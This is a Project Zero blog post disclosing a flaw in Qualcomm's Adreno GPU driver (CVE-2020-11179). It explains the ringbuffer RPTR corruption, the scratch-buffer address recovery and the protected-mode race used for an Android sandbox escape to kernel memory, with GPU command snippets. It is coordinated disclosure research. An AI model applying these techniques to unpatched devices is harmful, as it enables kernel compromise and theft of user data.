
Attacking the Qualcomm Adreno GPU

Posted by Ben Hawkes, Project Zero


When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a wide range of remote attacks that give you code execution with the privileges of an application (like the browser or a messaging application), but a sandbox escape is still required to gain full system access.


This blog post focuses on an interesting attack surface that is accessible from the Android application sandbox: the graphics processing unit (GPU) hardware. We describe an unusual vulnerability in Qualcomm's Adreno GPU, and how it could be used to achieve kernel code execution from within the Android application sandbox.


This research was built upon the work by Guang Gong (@oldfresher), who reported CVE-2019-10567 in August 2019. One year later, in early August 2020, Guang Gong released an excellent whitepaper describing CVE-2019-10567, and some other vulnerabilities that allowed full system compromise by a remote attacker. 


However, in June 2020, I noticed that the patch for CVE-2019-10567 was incomplete, and worked with Qualcomm's security team and GPU engineers to fix the issue at its root cause. The patch for this new issue, CVE-2020-11179, has been released to OEM vendors for integration. It's our understanding that Qualcomm will list this publicly in their November 2020 bulletin.


Qualcomm provided the following statement:


"Providing technologies that support robust security and privacy is a priority for Qualcomm Technologies. We commend the security researchers from Google Project Zero for using industry-standard coordinated disclosure practices. Regarding the Qualcomm Adreno GPU vulnerability, we have no evidence it is currently being exploited, and Qualcomm Technologies made a fix available to OEMs in August 2020. We encourage end users to update their devices as patches become available from their carrier or device maker and to only install applications from trusted locations such as the Google Play Store."


Android Attack Surface


The Android application sandbox is an evolving combination of SELinux, seccomp BPF filters, and discretionary access control based on a unique per-application UID. The sandbox is used to limit the resources that an application has access to, and to reduce attack surface. There are a number of well-known routes that attackers use to escape the sandbox, such as: attacking other apps, attacking system services, or attacking the Linux kernel.


At a high-level, there are several different tiers of attack surface in the Android ecosystem. Here are some of the important ones:


  • Tier: Ubiquitous

Description: Issues that affect all devices in the Android ecosystem. 

Example: Core Linux kernel bugs like Dirty COW, or vulnerabilities in standard system services.


  • Tier: Chipset

Description: Issues that affect a substantial portion of the Android ecosystem, based on which type of hardware is used by various OEM vendors.

Example: Snapdragon SoC perf counter vulnerability, or Broadcom WiFi firmware stack overflow.


  • Tier: Vendor

Description: Issues that affect most or all devices from a particular Android OEM vendor.

Example: Samsung kernel driver vulnerabilities.


  • Tier: Device

Description: Issues that affect a particular device model from an Android OEM vendor.

Example: Pixel 4 face unlock "attention aware" vulnerability.


From an attacker's perspective, maintaining an Android exploit capability is a question of covering the widest possible range of the Android ecosystem in the most cost-effective way. Vulnerabilities in the ubiquitous tier are particularly attractive for affecting a lot of devices, but might be expensive to find and relatively short-lived compared to other tiers. The chipset tier will normally give you quite a lot of coverage with each exploit, but not as much as the ubiquitous tier. For some attack surfaces, such as baseband and WiFi attacks, the chipset tier is your primary option. The vendor and device tiers are easier to find vulnerabilities in, but require that a larger number of individual exploits be maintained.


For sandbox escapes, the GPU offers up a particularly interesting attack surface from the chipset tier. Since GPU acceleration is widely used in applications, the Android sandbox allows full access to the underlying GPU device. Furthermore, there are only two implementations of GPU hardware that are particularly popular in Android devices: ARM Mali and Qualcomm Adreno.


That means that if an attacker can find a nicely exploitable bug in these two GPU implementations, then they can effectively maintain a sandbox escape exploit capability against most of the Android ecosystem. Moreover, since GPUs are highly complex, with a significant amount of closed-source components (such as firmware/microcode), there is a good opportunity to find a reasonably powerful and long-lived vulnerability.


Something Looks Weird


With this in mind, in late April 2020, I noticed the following commit in the Qualcomm Adreno kernel driver code:


From 0ceb2be799b30d2aea41c09f3acb0a8945dd8711 Mon Sep 17 00:00:00 2001

From: Jordan Crouse <[email protected]>

Date: Wed, 11 Sep 2019 08:32:15 -0600

Subject: [PATCH] msm: kgsl: Make the "scratch" global buffer use a random GPU address


Select a random global GPU address for the "scratch" buffer that is used

by the ringbuffer for various tasks.


When we think of adding entropy to addresses, we usually think of Address Space Layout Randomization (ASLR). But here we're talking about a GPU virtual address, not a kernel virtual address. That seems unusual: why would a GPU address need to be randomized?


It was relatively straightforward to confirm that this commit was one of the security patches for CVE-2019-10567, which are linked in Qualcomm's advisory. A related patch was also included for this CVE:


From 8051429d4eca902df863a7ebb3c04cbec06b84b3 Mon Sep 17 00:00:00 2001

From: Jordan Crouse <[email protected]>

Date: Mon, 9 Sep 2019 10:41:36 -0600

Subject: [PATCH] msm: kgsl: Execute user profiling commands in an IB


Execute user profiling in an indirect buffer. This ensures that addresses

and values specified directly from the user don't end up in the

ringbuffer.


And so the question becomes: why exactly is it important that user content doesn't end up in the ringbuffer, and is this patch really sufficient to prevent that? And what happens if we can recover the base address of the scratch mapping? Both attacks looked at least superficially possible, so this research project was off to a great start.


Before we go any further, let's take a step back and describe some of the basic components involved here: GPU, ringbuffer, scratch mapping, and so on.


Adreno Introduction


The GPU is the workhorse of modern graphics computing, and most applications use the GPU extensively. From the application's perspective, the specific implementation of GPU hardware is normally abstracted away by libraries such as OpenGL ES and Vulkan. These libraries implement a standard API for programming common GPU accelerated operations, such as texture mapping and running shaders. At a low level however, this functionality is implemented by interacting with the GPU device driver running in kernel space.




Specifically for Qualcomm Adreno, the /dev/kgsl-3d0 device file is ultimately used to implement higher level GPU functionality. The /dev/kgsl-3d0 file is directly accessible within the untrusted application sandbox, because:

  1. The device file has global read/write access set in its file permissions. The permissions are set by ueventd:


sargo:/ # cat /system/vendor/ueventd.rc | grep kgsl-3d0

/dev/kgsl-3d0             0666   system     system

  2. The device file has its SELinux label set to gpu_device, and the untrusted_app SELinux context has a specific allow rule for this label:

sargo:/ # ls -Zal /dev/kgsl-3d0

crw-rw-rw- 1 system system u:object_r:gpu_device:s0 239, 0 2020-07-21 

15:48 /dev/kgsl-3d0


[email protected]:~$ adb pull /sys/fs/selinux/policy

/sys/fs/selinux/policy: 1 file pulled, 0 skipped. 16.1 MB/s ...

[email protected]:~$ sesearch -A -s untrusted_app policy | grep gpu_device

allow untrusted_app gpu_device:chr_file { append getattr ioctl lock map

open read write };


This means that the application can open the device file. The Adreno "KGSL" kernel device driver is then primarily invoked through a number of different ioctl calls (e.g. to allocate shared memory, create a GPU context, submit GPU commands, etc.) and mmap (e.g. to map shared memory in to the userspace application).


GPU Shared Mappings


For the most part, applications use shared mappings to load vertices, fragments, and shaders into the GPU and to receive computed results. That means certain physical memory pages are shared between a userland application and the GPU hardware.  


To set up a new shared mapping, the application will ask the KGSL kernel driver for an allocation by calling the IOCTL_KGSL_GPUMEM_ALLOC ioctl. The kernel driver will prepare a region of physical memory, and then map this memory into the GPU's address space (for a particular GPU context, explained below). Finally, the application will map the shared memory into the userland address space by using an identifier returned from the allocation ioctl.
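
To make this concrete, here is a minimal userspace sketch of the flow, assuming the IOCTL_KGSL_GPUMEM_ALLOC_ID variant of the allocation ioctl and the structure layout from the msm_kgsl.h UAPI header (exact ioctl numbers, fields, and the id-based mmap offset convention may differ between kernel versions):

/* Sketch: allocate GPU shared memory and map it into userspace. The
 * definitions below are reproduced from the msm_kgsl.h UAPI header as best
 * I can tell, and may differ between kernel versions. */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>

#define KGSL_IOC_TYPE 0x09

struct kgsl_gpumem_alloc_id {
        unsigned int id;        /* out: identifier for this allocation */
        unsigned int flags;
        uint64_t size;          /* in: requested size */
        uint64_t mmapsize;      /* out: size to use when mapping */
        unsigned long gpuaddr;  /* out: GPU virtual address */
        unsigned long __pad[2];
};

#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
        _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)

int main(void)
{
        int fd = open("/dev/kgsl-3d0", O_RDWR);
        if (fd < 0)
                return 1;

        struct kgsl_gpumem_alloc_id alloc = { .size = 0x1000 };
        if (ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC_ID, &alloc) < 0)
                return 1;

        /* CPU-side view: map the allocation using the returned id as the
         * mmap offset, in units of pages (assumed convention). */
        void *cpu_view = mmap(NULL, alloc.mmapsize, PROT_READ | PROT_WRITE,
                              MAP_SHARED, fd, (off_t)alloc.id << 12);
        if (cpu_view == MAP_FAILED)
                return 1;

        /* The GPU-side view of the same physical pages is alloc.gpuaddr. */
        printf("CPU view: %p, GPU view: 0x%lx\n", cpu_view, alloc.gpuaddr);
        return 0;
}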


At this point, there are two distinct views on the same pages of physical memory. The first view is from the userland application, which uses a virtual address to access the memory that is mapped into its address space. The CPU's memory management unit (MMU) will perform address translation to find the appropriate physical page.


The other is the view from the GPU hardware itself, which uses a GPU virtual address. The GPU virtual address is chosen by the KGSL kernel driver, which configures the device's IOMMU (called the SMMU on ARM) with a page table structure that is used just for the GPU. When the GPU tries to read or write the shared memory mapping, the IOMMU will translate the GPU virtual address to a physical page in memory. This is similar to the address translation performed on the CPU, but with a completely different address space (i.e. the pointer value used in the application will be different to the pointer value used in the GPU).




Each userland process has its own GPU context, meaning that while a certain application is running operations on the GPU, the GPU will only be able to access mappings that it shares with that process. This is needed so that one application can't ask the GPU to read the shared mappings from another application. In practice this separation is achieved by changing which set of page tables is loaded into the IOMMU whenever a GPU context switch occurs. A GPU context switch occurs whenever the GPU is scheduled to run a command from a different process.


However certain mappings are used by all GPU contexts, and so can be present in every set of page tables. They are called global shared mappings, and are used for a variety of system and debugging functions between the GPU and the KGSL kernel driver. While they are never mapped directly into a userland application (e.g. a malicious application can't read or modify the contents of the global mappings directly), they are mapped into both the GPU and kernel address spaces.


On a rooted Android device, we can dump the global mappings (and their GPU virtual addresses) using the following command:


sargo:/ # cat /sys/kernel/debug/kgsl/globals

0x00000000fc000000-0x00000000fc000fff             4096 setstate

0x00000000fc001000-0x00000000fc040fff           262144 gpu-qdss

0x00000000fc041000-0x00000000fc048fff            32768 memstore

0x00000000fce7a000-0x00000000fce7afff             4096 scratch

0x00000000fc049000-0x00000000fc049fff             4096 pagetable_desc

0x00000000fc04a000-0x00000000fc04afff             4096 profile_desc

0x00000000fc04b000-0x00000000fc052fff            32768 ringbuffer

0x00000000fc053000-0x00000000fc053fff             4096 pagetable_desc

0x00000000fc054000-0x00000000fc054fff             4096 profile_desc

0x00000000fc055000-0x00000000fc05cfff            32768 ringbuffer

0x00000000fc05d000-0x00000000fc05dfff             4096 pagetable_desc

0x00000000fc05e000-0x00000000fc05efff             4096 profile_desc

0x00000000fc05f000-0x00000000fc066fff            32768 ringbuffer

0x00000000fc067000-0x00000000fc067fff             4096 pagetable_desc

0x00000000fc068000-0x00000000fc068fff             4096 profile_desc

0x00000000fc069000-0x00000000fc070fff            32768 ringbuffer

0x00000000fc071000-0x00000000fc0a0fff           196608 profile

0x00000000fc0a1000-0x00000000fc0a8fff            32768 ucode

0x00000000fc0a9000-0x00000000fc0abfff            12288 capturescript

0x00000000fc0ac000-0x00000000fc116fff           438272 capturescript_regs

0x00000000fc117000-0x00000000fc117fff             4096 powerup_register_list

0x00000000fc118000-0x00000000fc118fff             4096 alwayson

0x00000000fc119000-0x00000000fc119fff             4096 preemption_counters

0x00000000fc11a000-0x00000000fc329fff          2162688 preemption_desc

0x00000000fc32a000-0x00000000fc32afff             4096 perfcounter_save_restore_desc

0x00000000fc32b000-0x00000000fc53afff          2162688 preemption_desc

0x00000000fc53b000-0x00000000fc53bfff             4096 perfcounter_save_restore_desc

0x00000000fc53c000-0x00000000fc74bfff          2162688 preemption_desc

0x00000000fc74c000-0x00000000fc74cfff             4096 perfcounter_save_restore_desc

0x00000000fc74d000-0x00000000fc95cfff          2162688 preemption_desc

0x00000000fc95d000-0x00000000fc95dfff             4096 perfcounter_save_restore_desc

0x00000000fc95e000-0x00000000fc95efff             4096 smmu_info


And suddenly our scratch buffer has appeared! To the left we see the GPU virtual addresses of each global mapping, then a size, and then the name of the allocation. By rebooting the device several times and checking the layout, we can see that the scratch buffer is indeed randomized:


0x00000000fc0df000-0x00000000fc0dffff             4096 scratch

...

0x00000000fcfc0000-0x00000000fcfc0fff             4096 scratch

...

0x00000000fc9ff000-0x00000000fc9fffff             4096 scratch

...

0x00000000fcb4d000-0x00000000fcb4dfff             4096 scratch


The same test reveals that the scratch buffer is the only global mapping that is randomized, all other global mappings have a fixed GPU address in the range [0xFC000000, 0xFD400000]. That makes sense, because the patch for CVE-2019-10567 only introduced the KGSL_MEMDESC_RANDOM flag for the scratch buffer allocation. 


So we now know that the scratch buffer is correctly randomized (at least to some extent), and that it is a global shared mapping present in every GPU context. But what exactly is the scratch buffer used for?


The Scratch Buffer


Diving into the driver code, we can clearly see the scratch buffer being allocated in the driver's probe routines, meaning that the scratch buffer will be allocated when the device is first initialized:


int adreno_ringbuffer_probe(struct adreno_device *adreno_dev, bool nopreempt)

{

...

status = kgsl_allocate_global(device, &device->scratch,

                            PAGE_SIZE, 0, KGSL_MEMDESC_RANDOM, "scratch");


We also find this useful comment:


 /* SCRATCH MEMORY: The scratch memory is one page worth of data that

 *  is mapped into the GPU. This allows for some 'shared' data between

 *  the GPU and CPU. For example, it will be used by the GPU to write

 *  each updated RPTR for each RB.


By cross referencing all the usages of the resulting memory descriptor (device->scratch) in the kernel driver, we can find two primary usages of the scratch buffer:


  1. The GPU address of a preemption restore buffer is dumped to the scratch memory, which appears to be used if a higher priority GPU command interrupts a lower priority command.

  2. The read pointer (RPTR) of the ringbuffer (RB) is read from scratch memory and used when calculating the amount of free space in the ringbuffer (the layout of these RPTR slots is sketched below).
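
For reference, the per-ringbuffer RPTR slots live at the very start of the scratch page. The KGSL driver addresses them with macros along these lines (from kgsl_device.h in the msm kernel tree; reproduced here for clarity):

/* Each ringbuffer id gets a 4-byte RPTR slot at the start of the scratch
 * page; adreno_get_rptr (shown in the next section) reads from here. */
#define SCRATCH_RPTR_OFFSET(id) ((id) * sizeof(unsigned int))
#define SCRATCH_RPTR_GPU_ADDR(dev, id) \
        ((dev)->scratch.gpuaddr + SCRATCH_RPTR_OFFSET(id))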


Here we can start to connect the dots. Firstly, we know that the patch for CVE-2019-10567 included changes to both the scratch buffer and the ringbuffer handling code -- that suggests we should focus on the second use case above. 


If the GPU is writing RPTR values to the shared mapping (as the comment suggests), and if the kernel driver is reading RPTR values from the scratch buffer and using it for allocation size calculations, then what happens if we can make the GPU write an invalid or incorrect RPTR value?


Ringbuffer Basics


To understand what an invalid RPTR value might mean for a ringbuffer allocation, we first need to describe the ringbuffer itself. When a userland application submits a GPU command (IOCTL_KGSL_GPU_COMMAND), the driver code dispatches the command to the GPU via the ringbuffer, which uses a producer-consumer pattern. The kernel driver will write commands into the ringbuffer, and the GPU will read commands from the ringbuffer.


This occurs in a similar fashion to classical circular buffers. At a low level, the ringbuffer is a global shared mapping with a fixed size of 32768 bytes. Two indices are maintained to track where the CPU is writing to (WPTR), and where the GPU is reading from (RPTR). To allocate space on the ringbuffer, the CPU has to calculate whether there is sufficient room between the current WPTR and the current RPTR. This happens in adreno_ringbuffer_allocspace:


unsigned int *adreno_ringbuffer_allocspace(struct adreno_ringbuffer *rb,

                unsigned int dwords)

{

        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);

        unsigned int rptr = adreno_get_rptr(rb); [1]

        unsigned int ret;


        if (rptr <= rb->_wptr) { [2]

                unsigned int *cmds;


                if (rb->_wptr + dwords <= (KGSL_RB_DWORDS - 2)) {

                        ret = rb->_wptr;

                        rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;

                        return RB_HOSTPTR(rb, ret);

                }

                

                /* 

                 * There isn't enough space toward the end of ringbuffer. So

                 * look for space from the beginning of ringbuffer upto the

                 * read pointer.

                 */

                if (dwords < rptr) {

                        cmds = RB_HOSTPTR(rb, rb->_wptr);

                        *cmds = cp_packet(adreno_dev, CP_NOP,

                                KGSL_RB_DWORDS - rb->_wptr - 1);

                        rb->_wptr = dwords;

                        return RB_HOSTPTR(rb, 0);

                }

        }


        if (rb->_wptr + dwords < rptr) { [3]

                ret = rb->_wptr;

                rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;

                return RB_HOSTPTR(rb, ret); [4]

        }


        return ERR_PTR(-ENOSPC);

}


unsigned int adreno_get_rptr(struct adreno_ringbuffer *rb)

{

        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);

        unsigned int rptr = 0;

...

                struct kgsl_device *device = KGSL_DEVICE(adreno_dev);


                kgsl_sharedmem_readl(&device->scratch, &rptr,

                                SCRATCH_RPTR_OFFSET(rb->id)); [5]

...

        return rptr;

}


We can see the RPTR value being read at [1], and that it ultimately comes from a read of the scratch global shared mapping at [5]. Then we can see the scratch RPTR value being used in two comparisons with the WPTR value at [2] and [3]. The first comparison is for the case where the scratch RPTR is less than or equal to WPTR, meaning that there may be free space toward the end of the ringbuffer or at the beginning of the ringbuffer. The second comparison is for the case where the scratch RPTR is higher than the WPTR. If there's enough room between the WPTR and scratch RPTR, then we can use that space for an allocation.


So what happens if the scratch RPTR value is controlled by an attacker? In that case, the attacker could make either one of these conditions succeed, even if there isn't actually space in the ringbuffer for the requested allocation size. For example, we can make the condition at [3] succeed when it normally wouldn't by artificially increasing the value of the scratch RPTR, which at [4] results in returning a portion of the ringbuffer that overlaps the correct RPTR location. 


That means that an attacker could overwrite ringbuffer commands that haven't yet been processed by the GPU with incoming GPU commands! Or in other words, controlling the scratch RPTR value could desynchronize the CPU and GPU's understanding of the ringbuffer layout. That sounds like it could be very useful! But how can we overwrite the scratch RPTR value?


Attacking the Scratch RPTR Value


Since global shared mappings are not mapped into userland, an attacker cannot modify the scratch buffer directly from their malicious/compromised userland process. However we know that the scratch buffer is mapped into every GPU context, including any created by a malicious attacker. What if we could make the GPU hardware write a malicious RPTR value into the scratch buffer on our behalf?  


To achieve this, there are two fundamental steps. Firstly, we need to confirm that the mapping is writable by user-supplied GPU commands. Secondly, we need a way to recover the base GPU address of the scratch mapping. This latter step is necessary due to the recent addition of GPU address randomization for the scratch mapping.


So are all global shared mappings writable by the GPU? It turns out that not every global shared mapping can be written to by user-supplied GPU commands, but the scratch buffer can be. We can confirm this by using the debugfs method above to find the randomized base of the scratch mapping, and then writing a short sequence of GPU commands to write a value to the scratch mapping:


    /* write a value to the scratch buffer at offset 256 */

    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);

    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);

    *cmds++ = 0x41414141;


    /* ensure that the write has taken effect */

    *cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);

    *cmds++ = 0x13;

    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);

    *cmds++ = 0x41414141;

    *cmds++ = 0xffffffff;

    *cmds++ = 0x1;

    

    /* write 1 to userland shared memory to signal success */

    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);

    cmds += cp_gpuaddr(cmds, shared_mem_gpuaddr);

    *cmds++ = 0x1;


Each CP_* operation here is constructed in userspace and run on the GPU hardware. Typically, OpenGL library methods and shaders would be translated to these raw operations by a vendor-supported library, but an attacker can also construct these command sequences manually by setting up some GPU shared memory and calling IOCTL_KGSL_GPU_COMMAND. These operations aren't documented, however, so behavior has to be inferred from reading the driver code and from manual testing. Some examples are: 1) the CP_MEM_WRITE operation writes a constant value to a GPU address, 2) the CP_WAIT_REG_MEM operation stalls execution until a GPU address contains a certain constant value, and 3) the CP_MEM_TO_MEM operation copies data from one GPU address to another.


That means that we can be sure that the GPU successfully wrote to the scratch buffer by checking that the final write occurs (on a normal userland shared memory mapping) -- if the scratch buffer write wasn't successful, the CP_WAIT_REG_MEM operation would time out and no value would be written back.
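
For completeness, here is a reconstruction of the packet-building helpers used in the snippet above, modeled on adreno_pm4types.h from the KGSL driver. Treat this as a sketch rather than the authoritative definitions; the a5xx+ two-dword address form is assumed:

#include <stdint.h>

#define CP_TYPE7_PKT (7u << 28)

/* Odd parity over the bits of val (folded down to 4 bits, then looked up
 * in the 0x9669 truth table). */
#define PM4_PARITY(val) \
        ((0x9669u >> (0xfu & ((val) ^ ((val) >> 4) ^ ((val) >> 8) ^ \
                              ((val) >> 12) ^ ((val) >> 16) ^ ((val) >> 20) ^ \
                              ((val) >> 24) ^ ((val) >> 28)))) & 1)

/* Build a type-7 packet header: payload size, 7-bit opcode, parity bits. */
static inline uint32_t cp_type7_packet(uint32_t opcode, uint32_t cnt)
{
        return CP_TYPE7_PKT | (cnt << 0) | (PM4_PARITY(cnt) << 15) |
               ((opcode & 0x7f) << 16) | (PM4_PARITY(opcode) << 23);
}

/* Emit a 64-bit GPU address as two dwords (lo, hi); returns the number of
 * dwords written so callers can advance their command pointer. */
static inline int cp_gpuaddr(uint32_t *cmds, uint64_t gpuaddr)
{
        cmds[0] = (uint32_t)gpuaddr;
        cmds[1] = (uint32_t)(gpuaddr >> 32);
        return 2;
}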


It's also possible to confirm that the scratch buffer is writable by looking at how the page tables for the global shared mapping are set up in the kernel driver code. Specifically, since the call to kgsl_allocate_global doesn't have KGSL_MEMFLAGS_GPUREADONLY or KGSL_MEMDESC_PRIVILEGED flags set, the resulting mapping is writable by user-supplied GPU commands.


But if the scratch buffer's base address is randomized, how do we know where to write to? There were two approaches to recovering the base address of the scratch buffer.


The first approach was to simply take the GPU command sequence used above to confirm that the scratch buffer was writable, and turn it into a bruteforce attack. Since we know that global shared mappings live in a fixed range, and that only the scratch buffer is randomized within it, we have a very small search space to explore. Once the other static global shared mapping locations are removed from consideration, there are only 2721 possible locations for the scratch page. On average, it took 7.5 minutes to recover the scratch buffer address on a mid-range smartphone, and this time could likely be optimized further.
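
As a rough illustration, the search loop might look like the sketch below, where probe_scratch() and is_static_global() are hypothetical helpers: the former submits the CP_MEM_WRITE/CP_WAIT_REG_MEM probe shown earlier against a candidate address and reports whether the signal write landed, and the latter filters out the known static global mappings:

#include <stdint.h>

/* Hypothetical: submit the probe commands from the earlier snippet with
 * SCRATCH_BASE set to `candidate`; returns 1 if the signal value appeared
 * in our shared mapping, 0 if CP_WAIT_REG_MEM timed out. */
int probe_scratch(uint64_t candidate);

/* Hypothetical: returns 1 if `candidate` falls inside one of the static
 * (non-randomized) global mappings from the debugfs dump. */
int is_static_global(uint64_t candidate);

uint64_t find_scratch_base(void)
{
        /* Global shared mappings live in a fixed region, and only the
         * scratch page is randomized within it, leaving 2721 candidates. */
        for (uint64_t addr = 0xFC000000; addr < 0xFD400000; addr += 0x1000) {
                if (is_static_global(addr))
                        continue;
                if (probe_scratch(addr))
                        return addr;
        }
        return 0; /* not found */
}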


The second approach was even better. As mentioned above, the scratch buffer is also used for preemption. To prepare the GPU for preemption, the kernel driver calls the a6xx_preemption_pre_ibsubmit function, which inserts a number of operations into the ringbuffer. The details of those operations aren't very important for our attack, other than the fact that a6xx_preemption_pre_ibsubmit spilled a scratch buffer pointer to the ringbuffer as an argument to a CP_MEM_WRITE operation. 


Since the ringbuffer is a global mapping and readable by user-supplied GPU commands, it was possible to immediately extract the base of the scratch mapping by using a CP_MEM_TO_MEM command at the right offset into the ringbuffer (i.e. we copied the contents of the ringbuffer to an attacker controlled userland shared mapping, and the contents contained a pointer to the randomized scratch buffer).
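
A sketch of that leak, assuming the 5-dword CP_MEM_TO_MEM form seen in the driver (a flags dword followed by 64-bit destination and source addresses, copying one dword per operation); rb_gpuaddr and spill_offset are placeholders for the fixed ringbuffer base and the offset of the spilled pointer:

/* Copy the spilled 64-bit scratch pointer out of the (GPU-readable)
 * ringbuffer into our own shared mapping, one dword at a time, then read
 * it back from the CPU side. A flags value of 0 is assumed to select a
 * plain 32-bit copy. */
*cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
*cmds++ = 0;                                              /* flags */
cmds += cp_gpuaddr(cmds, shared_mem_gpuaddr);             /* dest (lo) */
cmds += cp_gpuaddr(cmds, rb_gpuaddr + spill_offset);      /* src (lo) */

*cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
*cmds++ = 0;                                              /* flags */
cmds += cp_gpuaddr(cmds, shared_mem_gpuaddr + 4);         /* dest (hi) */
cmds += cp_gpuaddr(cmds, rb_gpuaddr + spill_offset + 4);  /* src (hi) */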


Overwriting the Ringbuffer


Now that we know we can reliably control the scratch RPTR value, we can turn our attention to corrupting the contents of the ringbuffer. What exactly is contained in the ringbuffer, and what does overwriting it buy us?


There are actually four different ringbuffers, each used for a different GPU priority, but we only need one for this attack. To avoid noise from other applications using the GPU, we choose the ringbuffer that gets used the least on a modern Android device (ringbuffer 0, which at the time wasn't used at all by Android). Note that the ringbuffer global shared mapping uses the KGSL_MEMFLAGS_GPUREADONLY flag, so an attacker cannot directly modify the ringbuffer contents; we need to use the scratch RPTR primitive to achieve this.


Recall that the ringbuffer is used to send commands from the CPU to the GPU. In practice however, user-supplied GPU commands are never placed directly onto the ringbuffer. This is for two reasons: 1) space in the ringbuffer is limited, and user-supplied GPU commands can be very large, and 2) the ringbuffer is readable by all GPU contexts, and so we want to ensure that one process can't read commands from a different process.


Instead, a layer of indirection occurs, and user-supplied GPU commands are run after an "indirect branch" from the ringbuffer occurs. Conceptually system level commands are executed straight from the ringbuffer, and user level commands are run after an indirect branch into GPU shared memory. Once the user commands finish, control flow will return to the next ringbuffer operation. The indirect branch is performed with a CP_INDIRECT_BUFFER_PFE operation, which is inserted into the ringbuffer by adreno_ringbuffer_submitcmd. This operation takes two parameters, the GPU address of the branch target (e.g. a GPU shared memory mapping with user-supplied commands in it) and a size value.
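
For illustration, on a5xx and newer GPUs the ringbuffer entry for such an indirect branch looks roughly like the following (a type-7 packet with three payload dwords: the 64-bit branch target and a size in dwords); ib_gpuaddr and ib_dwords are placeholders:

/* Branch to user-supplied GPU commands at ib_gpuaddr; execution returns
 * to the next ringbuffer operation once ib_dwords dwords have run. */
*cmds++ = cp_type7_packet(CP_INDIRECT_BUFFER_PFE, 3);
cmds += cp_gpuaddr(cmds, ib_gpuaddr);   /* 64-bit branch target */
*cmds++ = ib_dwords;                    /* size of the indirect buffer */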


Aside from the indirect branch operation, the ringbuffer contains a number of other GPU command setup and teardown operations, something a bit like the prologue and epilogue of a compiled function. This includes the preemption setup mentioned earlier, GPU context switches, hooks for performance monitoring, errata fixups, identifiers, and protected mode operations. Given that we have some sort of ringbuffer corruption primitive, protected mode operations certainly sound like a potential target area, so let's explore this further.


Protected Mode


When a user-supplied GPU command is running on the GPU, it runs with protected mode enabled. This means that certain global shared mappings and certain GPU register ranges cannot be accessed (read or written). It turns out that this is critically important to the security model of the GPU architecture.


If we examine the driver code for all instances of protected mode being disabled (using the CP_SET_PROTECTED_MODE operation), we see just a handful of examples. Operations related to preemption, errata fixups, performance counters, and GPU context switches can all potentially run with protected mode disabled.


This last operation, GPU context switches, sounds particularly interesting. As a reminder, the GPU context switch occurs when two different processes are using the same ringbuffer. Since the GPU commands from one process aren't allowed to operate on the shared memory belonging to another process, the context switch is needed to switch out the page tables that the GPU has loaded.


What if we could make the GPU switch to an attacker controlled page table? Not only would our GPU commands be able to read and write shared mappings from other processes, we would be able to read and write to any physical address in memory, including kernel memory!


This is an intriguing proposition, and looking at how the kernel driver sets up the context switch operations in the ringbuffer, it looks alluringly possible. Based on a cursory review of the driver code, it looks like the GPU has an operation to switch page tables called CP_SMMU_TABLE_UPDATE. It's possible that this design was chosen for performance considerations, as it means that the GPU can perform a context switch without having to interrupt the kernel and wait for the IOMMU to be reconfigured -- it can simply reconfigure itself.


Digging further, it appears that the GPU also has the IOMMU's "TTBR0" register mapped to a protected mode GPU register. By reading the ARM address translation and IOMMU documentation, we can see that TTBR0 holds the base address of the page tables used for translating GPU addresses to physical memory addresses. That means that if we can point TTBR0 to a set of malicious page tables, then we can translate any GPU address to any physical address of our choosing.


And suddenly, we have a clear idea of how the original attack in CVE-2019-10567 worked. Recall that aside from randomizing the scratch buffer location, the patch for CVE-2019-10567 also "ensures that addresses and values specified directly from the user don't end up in the ringbuffer". 


We can now study Guang Gong's whitepaper and confirm that his attack managed to use the RPTR corruption technique (at the time using the static address of the scratch buffer) to smuggle operations into the ringbuffer via the arguments to performance profiling commands, which would then be executed due to clever alignment with the "true" RPTR value on the GPU. The smuggled operations disabled protected mode and branched to attacker controlled GPU commands, which promptly overwrote TTBR0 to gain a R/W primitive to arbitrary physical memory. Amazing!


Recovering the Attack


Since we have already bypassed the first part of the patch for CVE-2019-10567 (randomizing the scratch buffer base), to recover the attack (i.e. to be able to use a modified TTBR0 to write physical memory), we simply need to bypass the second part as well.


In essence the second part of the patch for CVE-2019-10567 prevented attacker-controlled commands from being written to the ringbuffer, particularly by the profiling subsystem. The obvious path to bypassing this fix would be to find a different way to smuggle attacker-controlled commands. While there were some exciting looking avenues (such as using the user-supplied GPU address as a command opcode), I decided to pursue a different approach.


Rather than inserting attacker controlled commands into the ringbuffer, let's use the RPTR ringbuffer corruption primitive to desynchronize and reorder legitimate ringbuffer operations. The two basic ingredients we need are an operation that disables protected mode and an operation that performs an indirect branch -- both of which occur organically within the GPU kernel driver code.


The typical pattern for protected mode operations is to 1) drop protected mode, 2) perform some privileged operations, and 3) re-enable protected mode. Therefore, to recover the attack, we can race the window between steps 1 and 3. We can start the execution of a privileged operation such as a GPU context switch, and while it is still executing on the GPU with protected mode disabled, we can overwrite the privileged operations using the RPTR ringbuffer corruption primitive, essentially replacing the GPU context switch with an attacker-controlled indirect branch.



In order to win the race condition, we have to write an attacker controlled indirect branch to the correct offset in the ringbuffer (e.g. the offset of a context switch), and we need to time this write operation so that the GPU command processor has executed the operation to disable protected mode, but not yet executed the context switch itself. 


In practice this race condition appears to be highly feasible, and the temporal and spatial conditions are relatively stable. Specifically, by stalling the GPU with a wait command, and then synchronizing the context switch and the ringbuffer corruption primitives, we can establish a relative offset from the wait command where the GPU will first observe writes from the ringbuffer corruption. This discrete boundary likely results from caching behavior or a fixed-size internal prefetch buffer, and it makes it straightforward to calculate the correct layout of padding, payload, and context switch.


The race condition can be won at least 20% of the time, and since a failed attempt has no observable negative effects, the race condition can be repeated as many times as needed, which means that the attack can succeed almost immediately just by running the exploit in a loop. 


